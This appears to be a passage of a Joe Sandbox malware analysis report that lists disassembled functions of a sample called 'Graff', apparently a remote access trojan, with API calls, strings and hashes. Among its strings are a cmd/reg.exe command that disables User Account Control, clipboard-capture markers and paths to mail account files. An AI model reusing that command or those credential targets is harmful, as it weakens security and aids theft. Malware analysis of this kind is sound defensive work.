Opcode ID: 11618a2478ec7209284d7534862918e3a3c25a35337f5eeda2ab9df4c300d251
Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
Opcode Fuzzy Hash: 11618a2478ec7209284d7534862918e3a3c25a35337f5eeda2ab9df4c300d251
Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C

Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
_free.LIBCMT ref: 10005B2D
_free.LIBCMT ref: 10005B55
SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
_abort.LIBCMT ref: 10005B74

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174

Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
_free.LIBCMT ref: 00446EF6
_free.LIBCMT ref: 00446F1E
SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
_abort.LIBCMT ref: 00446F3D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F

Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5

Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9

Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8

Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED

Strings

[regsplt], xrefs: 00412B85
DG, xrefs: 00412B2F

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$DG
API String ID: 3554306468-1089238109
Opcode ID: 9c610c198af19325f0aed62b17f58fd5f6eeeef5c308309d088830eef79c7236
Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
Opcode Fuzzy Hash: 9c610c198af19325f0aed62b17f58fd5f6eeeef5c308309d088830eef79c7236
Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A

Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3

GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A

Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869

Strings

\Accounts\Account.rec0, xrefs: 1000125A
\Storage\, xrefs: 10001246
\Data\AccCfg\Accounts.tdat, xrefs: 1000120E
\Mail\, xrefs: 1000126D

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: lstrlen$_strlenlstrcat$AttributesFile
String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
API String ID: 4036392271-1520055953
Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758

Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00433519: RtlEnterCriticalSection.NTDLL(00470D18), ref: 00433524
Part of subcall function 00433519: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 00433561

Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB

__Init_thread_footer.LIBCMT ref: 0040AEA7

Part of subcall function 004334CF: RtlEnterCriticalSection.NTDLL(00470D18), ref: 004334D9
Part of subcall function 004334CF: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 0043350C

Strings

[End of clipboard], xrefs: 0040AEE9
0]G, xrefs: 0040AE70
[Text copied to clipboard], xrefs: 0040AEF6
,]G, xrefs: 0040AE80

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
API String ID: 2974294136-753205382
Opcode ID: abbb8d42ac9105b180fbc8f713d3699e1124760cd4ab3f6f761b53000c231522
Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
Opcode Fuzzy Hash: abbb8d42ac9105b180fbc8f713d3699e1124760cd4ab3f6f761b53000c231522
Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D

Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041CA6C
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
GetLastError.KERNEL32 ref: 0041CA91

Strings

0, xrefs: 0041CA2D
MsgWindowClass, xrefs: 0041CA28

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5

Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
CloseHandle.KERNEL32(?), ref: 00406A0F
CloseHandle.KERNEL32(?), ref: 00406A14

Strings

C:\Windows\System32\cmd.exe, xrefs: 004069FB
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9

Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F

Strings

CorExitProcess, xrefs: 10004B64
mscoree.dll, xrefs: 10004B52

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5

Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F

Strings

CorExitProcess, xrefs: 00442604
mscoree.dll, xrefs: 004425F2

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C

Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8

Strings

pth_unenc, xrefs: 00412778
BG, xrefs: 00412779, 004127AA, 0041277C

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc$BG
API String ID: 1818849710-2233081382
Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4

Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
SetEvent.KERNEL32(00000314), ref: 00404AF9
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
CloseHandle.KERNEL32(00000000), ref: 00404B0D

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

Strings

KeepAlive | Disabled, xrefs: 00404AC6

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B

Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79

Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A

Strings

SETTINGS, xrefs: 0041A643

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59

Function 00401430 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
GetProcAddress.KERNEL32(00000000), ref: 00401441

Strings

`Mw, xrefs: 0040143A
GetCursorInfo, xrefs: 00401430
User32.dll, xrefs: 00401435

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll$`Mw
API String ID: 1646373207-2986171508
Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E

Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9

Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
